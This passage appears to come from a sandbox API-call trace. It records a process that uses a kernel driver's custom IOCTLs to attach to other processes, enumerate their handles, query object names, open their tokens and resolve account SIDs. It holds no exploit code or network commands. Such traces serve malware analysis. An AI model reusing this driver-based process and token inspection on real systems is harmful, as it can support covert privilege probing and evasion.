Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.561] ObfDereferenceObject (Object=0xfffffa8002f8fda0) returned 0x1 [0247.561] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.561] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.561] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.561] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0247.561] PsLookupProcessByProcessId (in: ProcessId=0x69c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.561] PsAcquireProcessExitSynchronization () returned 0x0 [0247.561] KeStackAttachProcess (in: PROCESS=0xfffffa80030df060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80030df060, ApcState=0xfffff880053c85d0) [0247.561] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0247.561] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.561] PsReleaseProcessExitSynchronization () returned 0x2 [0247.561] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x24 [0247.561] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.561] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xa [0247.561] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.561] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa64) returned 0xc8 [0247.562] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0247.562] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800317b060, HandleInformation=0x0) returned 0x0 [0247.562] ObOpenObjectByPointer (in: Object=0xfffffa800317b060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0247.562] ObfDereferenceObject (Object=0xfffffa800317b060) returned 0x33 [0247.562] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002545e80 | out: TokenHandle=0xfffffa8002545e80*=0xc4) returned 0x0 [0247.562] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0247.562] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.562] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0247.562] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0247.564] CloseHandle (hObject=0xc4) returned 1 [0247.564] CloseHandle (hObject=0xc8) returned 1 [0247.564] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.564] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0247.564] PsLookupProcessByProcessId (in: ProcessId=0xa64, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.564] PsAcquireProcessExitSynchronization () returned 0x0 [0247.564] KeStackAttachProcess (in: PROCESS=0xfffffa800317b060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800317b060, ApcState=0xfffff880053c85d0) [0247.564] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800318d860, HandleInformation=0x0) returned 0x0 [0247.564] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.565] PsReleaseProcessExitSynchronization () returned 0x2 [0247.565] ObfDereferenceObject (Object=0xfffffa800317b060) returned 0x31 [0247.565] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.565] ObfDereferenceObject (Object=0xfffffa800318d860) returned 0x1 [0247.565] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.565] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.565] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.565] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0247.565] PsLookupProcessByProcessId (in: ProcessId=0xa64, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.565] PsAcquireProcessExitSynchronization () returned 0x0 [0247.565] KeStackAttachProcess (in: PROCESS=0xfffffa800317b060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800317b060, ApcState=0xfffff880053c85d0) [0247.565] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ee3f20, HandleInformation=0x0) returned 0x0 [0247.565] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.565] PsReleaseProcessExitSynchronization () returned 0x2 [0247.565] ObfDereferenceObject (Object=0xfffffa800317b060) returned 0x31 [0247.565] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.565] ObfDereferenceObject (Object=0xfffffa8001ee3f20) returned 0x1 [0247.565] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.565] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.565] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.566] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0247.566] PsLookupProcessByProcessId (in: ProcessId=0xa64, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.566] PsAcquireProcessExitSynchronization () returned 0x0 [0247.566] KeStackAttachProcess (in: PROCESS=0xfffffa800317b060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800317b060, ApcState=0xfffff880053c85d0) [0247.566] ObReferenceObjectByHandle (in: Handle=0x70, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0247.566] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.566] PsReleaseProcessExitSynchronization () returned 0x2 [0247.566] ObfDereferenceObject (Object=0xfffffa800317b060) returned 0x31 [0247.566] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.566] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0247.566] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.566] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.566] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.566] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0247.566] PsLookupProcessByProcessId (in: ProcessId=0xa64, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.566] PsAcquireProcessExitSynchronization () returned 0x0 [0247.566] KeStackAttachProcess (in: PROCESS=0xfffffa800317b060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800317b060, ApcState=0xfffff880053c85d0) [0247.566] ObReferenceObjectByHandle (in: Handle=0x84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0247.566] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.566] PsReleaseProcessExitSynchronization () returned 0x2 [0247.567] ObfDereferenceObject (Object=0xfffffa800317b060) returned 0x31 [0247.567] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.567] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0247.567] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.567] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.567] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.567] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0247.567] PsLookupProcessByProcessId (in: ProcessId=0xa64, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.567] PsAcquireProcessExitSynchronization () returned 0x0 [0247.567] KeStackAttachProcess (in: PROCESS=0xfffffa800317b060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800317b060, ApcState=0xfffff880053c85d0) [0247.567] ObReferenceObjectByHandle (in: Handle=0x10c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0247.567] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.567] PsReleaseProcessExitSynchronization () returned 0x2 [0247.567] ObfDereferenceObject (Object=0xfffffa800317b060) returned 0x31 [0247.567] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.567] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x51 [0247.567] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.567] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.567] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.567] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x114, lpOverlapped=0x0) returned 1 [0247.567] PsLookupProcessByProcessId (in: ProcessId=0xa64, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.567] PsAcquireProcessExitSynchronization () returned 0x0 [0247.567] KeStackAttachProcess (in: PROCESS=0xfffffa800317b060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800317b060, ApcState=0xfffff880053c85d0) [0247.568] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800314c590, HandleInformation=0x0) returned 0x0 [0247.568] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.568] PsReleaseProcessExitSynchronization () returned 0x2 [0247.568] ObfDereferenceObject (Object=0xfffffa800317b060) returned 0x31 [0247.568] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.568] ObfDereferenceObject (Object=0xfffffa800314c590) returned 0x1 [0247.568] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.568] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x494) returned 0xc8 [0247.568] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0247.568] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8003191b30, HandleInformation=0x0) returned 0x0 [0247.568] ObOpenObjectByPointer (in: Object=0xfffffa8003191b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0247.568] ObfDereferenceObject (Object=0xfffffa8003191b30) returned 0x14 [0247.568] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002545e80 | out: TokenHandle=0xfffffa8002545e80*=0xc4) returned 0x0 [0247.568] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0247.568] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.568] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0247.568] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0247.571] CloseHandle (hObject=0xc4) returned 1 [0247.571] CloseHandle (hObject=0xc8) returned 1 [0247.571] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.571] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0247.571] PsLookupProcessByProcessId (in: ProcessId=0x494, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.571] PsAcquireProcessExitSynchronization () returned 0x0 [0247.571] KeStackAttachProcess (in: PROCESS=0xfffffa8003191b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003191b30, ApcState=0xfffff880053c85d0) [0247.571] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80030a7700, HandleInformation=0x0) returned 0x0 [0247.571] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.571] PsReleaseProcessExitSynchronization () returned 0x2 [0247.571] ObfDereferenceObject (Object=0xfffffa8003191b30) returned 0x12 [0247.571] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.571] ObfDereferenceObject (Object=0xfffffa80030a7700) returned 0x1 [0247.571] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.571] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.571] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.571] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0247.571] PsLookupProcessByProcessId (in: ProcessId=0x494, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.571] PsAcquireProcessExitSynchronization () returned 0x0 [0247.572] KeStackAttachProcess (in: PROCESS=0xfffffa8003191b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003191b30, ApcState=0xfffff880053c85d0) [0247.572] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800264bf20, HandleInformation=0x0) returned 0x0 [0247.572] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.572] PsReleaseProcessExitSynchronization () returned 0x2 [0247.572] ObfDereferenceObject (Object=0xfffffa8003191b30) returned 0x12 [0247.572] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.572] ObfDereferenceObject (Object=0xfffffa800264bf20) returned 0x1 [0247.572] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.572] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.572] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.572] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0247.572] PsLookupProcessByProcessId (in: ProcessId=0x494, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.572] PsAcquireProcessExitSynchronization () returned 0x0 [0247.572] KeStackAttachProcess (in: PROCESS=0xfffffa8003191b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003191b30, ApcState=0xfffff880053c85d0) [0247.572] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800286faf0, HandleInformation=0x0) returned 0x0 [0247.572] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.572] PsReleaseProcessExitSynchronization () returned 0x2 [0247.572] ObfDereferenceObject (Object=0xfffffa8003191b30) returned 0x12 [0247.572] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.572] ObfDereferenceObject (Object=0xfffffa800286faf0) returned 0x3 [0247.572] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.573] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.573] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.573] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2e, lpOverlapped=0x0) returned 1 [0247.573] PsLookupProcessByProcessId (in: ProcessId=0x494, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.573] PsAcquireProcessExitSynchronization () returned 0x0 [0247.573] KeStackAttachProcess (in: PROCESS=0xfffffa8003191b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003191b30, ApcState=0xfffff880053c85d0) [0247.573] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003128880, HandleInformation=0x0) returned 0x0 [0247.573] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.573] PsReleaseProcessExitSynchronization () returned 0x2 [0247.573] ObfDereferenceObject (Object=0xfffffa8003191b30) returned 0x12 [0247.573] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.573] ObfDereferenceObject (Object=0xfffffa8003128880) returned 0x1 [0247.573] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.573] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a8) returned 0xc8 [0247.573] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0247.573] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80031ffb30, HandleInformation=0x0) returned 0x0 [0247.573] ObOpenObjectByPointer (in: Object=0xfffffa80031ffb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0247.573] ObfDereferenceObject (Object=0xfffffa80031ffb30) returned 0x29 [0247.573] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002545e80 | out: TokenHandle=0xfffffa8002545e80*=0xc4) returned 0x0 [0247.573] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0247.574] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.574] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0247.574] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0247.576] CloseHandle (hObject=0xc4) returned 1 [0247.576] CloseHandle (hObject=0xc8) returned 1 [0247.576] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.576] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: 